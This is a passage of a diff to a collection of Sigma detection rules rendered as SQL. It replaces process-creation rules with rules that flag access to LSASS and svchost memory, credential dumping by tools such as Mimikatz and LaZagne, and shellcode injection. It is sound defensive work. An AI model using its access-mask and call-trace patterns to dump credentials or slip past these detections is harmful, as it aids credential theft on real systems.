'\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' 